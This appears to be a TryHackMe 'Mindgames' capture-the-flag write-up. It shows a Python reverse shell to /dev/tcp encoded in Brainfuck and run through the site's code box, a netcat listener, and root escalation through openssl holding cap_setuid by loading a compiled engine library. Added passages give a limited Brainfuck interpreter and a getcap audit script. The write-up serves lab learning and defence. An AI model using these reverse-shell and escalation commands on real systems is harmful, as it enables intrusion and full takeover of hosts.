Hello. I’m Rahmos. Here is my Mindgames — TryHackMe — Writeup. Check it out!
First, deploy the machine and run nmap to find open ports:
nmap -A -T4 -p- -v <ip>
There are 2 ports opened: 22 (SSH) and 80 (HTTP).
First, let’s access the website.
Okay, so it's many lines of the Brainfuck programming language, and also a box for us to run code. I try to paste the "Hello, World" Brainfuck line and it works!
That means if you convert your Python code to Brainfuck, it can be executed here. So if I convert my Python reverse shell code to Brainfuck and run it, maybe I'll get a shell too! Note that it can only run Python, not other languages.
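To make the "run code" box concrete, here is an added example (my own code, not the site's, whose source the writeup never shows) of a Brainfuck interpreter with the limits a web-facing interpreter needs. It shows that a Brainfuck program produces nothing but a string of output; the box only becomes a code-execution vector if the server then hands that string to a Python interpreter, which is what the writeup relies on. The Hello World program is the standard one from the Brainfuck Wikipedia article; the step limit and tape size are values I chose.

```python
# Added example (not the site's code): a small Brainfuck interpreter with the
# resource limits a web-facing "run my code" box needs. A program's output is
# just a string; it is dangerous only if the server executes that string.
from typing import Dict, Tuple

# The classic "Hello World!" program (from the Brainfuck Wikipedia article).
HELLO_WORLD = ("++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
               ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++.")


def build_jump_table(code: str) -> Dict[int, int]:
    """Match every '[' with its ']' up front so loops are O(1) jumps."""
    stack, jumps = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise SyntaxError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise SyntaxError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def run_bf(code: str, stdin: bytes = b"", max_steps: int = 1_000_000,
           tape_size: int = 30_000) -> str:
    """Execute `code` and return everything it printed, as text.

    max_steps bounds CPU time (a '+[]' program would otherwise spin forever)
    and the tape is fixed-size with bounds checks, so the interpreter itself
    cannot be used to exhaust the host.
    """
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)
    ptr = pc = inp = steps = 0
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError(f"step limit of {max_steps} exceeded")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF   # 8-bit cells wrap around
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0  # EOF reads as 0
            inp += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return out.decode("latin-1")


def safe_run(code: str, stdin: bytes = b"") -> Tuple[str, str]:
    """What a web handler should do: run with limits and return the output
    as data to display, never as source code to execute."""
    try:
        return "ok", run_bf(code, stdin, max_steps=200_000)
    except (SyntaxError, RuntimeError, IndexError) as exc:
        return "error", str(exc)


if __name__ == "__main__":
    print(safe_run(HELLO_WORLD))
```

The design point is in safe_run: the interpreter's return value is text to show the user. A service that instead feeds that text to exec() or a Python subprocess has turned a harmless esoteric-language toy into remote code execution, which is exactly the bug this room is built around.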
I will use this link to decode or encode my Python code to Brainfuck. So here’s my Python code:
os.system('bash -c "bash -i >& /dev/tcp/<my-VPN-ip>/4444 0>&1"')
Paste these lines into the link above and click encrypt; you will get the Brainfuck code back.
Start a listener on your machine:
nc -lvnp 4444
Then paste the Brainfuck code into the website and run it; you will have the shell!
Now I’m in! Move around and get the 1st flag:
Now I’ll find a way to own root and get the final flag. Spawn a tty shell for stability using Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
First, let's try sudo -l to see what mindgames can run with sudo:
Uh oh! I don't know mindgames's password yet, so I cannot run sudo now. Let's try another way. This time, check capabilities:
getcap -r / 2>/dev/null
The openssl binary has the setuid capability. That means I can use openssl to setuid to 0 (root's uid) and become root. Look at openssl | GTFOBins:
OpenSSL can execute code via a library (an engine). So I can write a simple C program that calls setuid(0), compile it into a shared library and use openssl to load it. I'll use this link for reference.
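From the defender's side, the two paragraphs above describe exactly what a capability audit should catch: a binary that can load arbitrary code (openssl's engine mechanism) carrying a root-equivalent file capability. Here is an added example of my own (not from the writeup) that parses the output of the getcap -r / 2>/dev/null command used above and flags such binaries. The sample getcap lines are constructed to mirror the finding on this box, the baseline allow-list is an assumption for the example, and the list of root-equivalent capabilities is my choice.

```python
# Added example (not from the writeup): parse `getcap -r / 2>/dev/null` output
# and flag binaries whose file capabilities are equivalent to root. The sample
# lines and the baseline below are constructed for this example.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Capabilities that let a process become root or bypass DAC outright.
ROOT_EQUIVALENT: Set[str] = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
    "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_setfcap",
}

# Assumed allow-list of capabilities that are normal for specific binaries;
# a real baseline would be generated from a clean install of the same distro.
BASELINE: Dict[str, Set[str]] = {
    "/usr/bin/ping": {"cap_net_raw"},
    "/usr/bin/mtr-packet": {"cap_net_raw"},
}

# getcap prints either "path = caps+flags" (older libcap) or "path caps=flags"
# (libcap 2.41 and later); both forms are accepted here.
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<spec>\S+)$")
SPEC_RE = re.compile(r"^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]*)$")


@dataclass
class CapEntry:
    path: str
    caps: Set[str] = field(default_factory=set)
    flags: str = ""   # subset of "e" (effective), "i" (inheritable), "p" (permitted)


def parse_getcap(text: str) -> List[CapEntry]:
    """Turn raw getcap output into structured entries, skipping unparseable lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        s = SPEC_RE.match(m.group("spec"))
        if not s:
            continue
        names = {n for n in s.group("names").split(",") if n}
        entries.append(CapEntry(m.group("path"), names, s.group("flags")))
    return entries


def audit_getcap(text: str) -> List[dict]:
    """One finding per binary that carries an effective/inheritable
    root-equivalent capability, or that deviates from its known baseline."""
    findings = []
    for e in parse_getcap(text):
        risky = e.caps & ROOT_EQUIVALENT
        extra: Set[str] = set()
        if e.path in BASELINE:
            extra = e.caps - BASELINE[e.path]
        if risky and ("e" in e.flags or "i" in e.flags):
            findings.append({"path": e.path, "reason": "root-equivalent capability",
                             "caps": sorted(risky)})
        elif extra:
            findings.append({"path": e.path, "reason": "deviates from baseline",
                             "caps": sorted(extra)})
    return findings


# Constructed sample output; the openssl line mirrors the finding in the writeup.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet cap_net_raw=ep
"""

if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP):
        print(f"{f['path']}: {f['reason']} {f['caps']}")
```

Run over the sample, only /usr/bin/openssl is reported. In practice this check belongs in a configuration-compliance job or a host-based agent rule, and the fix for the finding is simply to remove the capability (setcap -r on the binary) and find out how it got there, since nothing in a stock install gives openssl cap_setuid.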
My program will look like this:
Now compile this .c file into a library and transfer it to the target machine.
gcc -fPIC -o shellroot.o -c shellroot.c
gcc -shared -o shellroot.so -lcrypto shellroot.o
These 2 commands compile the C program into a library called "shellroot.so":
Now start an HTTP server on your machine:
python3 -m http.server 9000
or, with Python 2:
python2 -m SimpleHTTPServer 9000
Then, from the target machine, cd /tmp and download it:
The library has been transferred successfully! Now use openssl to load this library:
openssl req -engine /tmp/shellroot.so
Now I’m root! Get the final flag: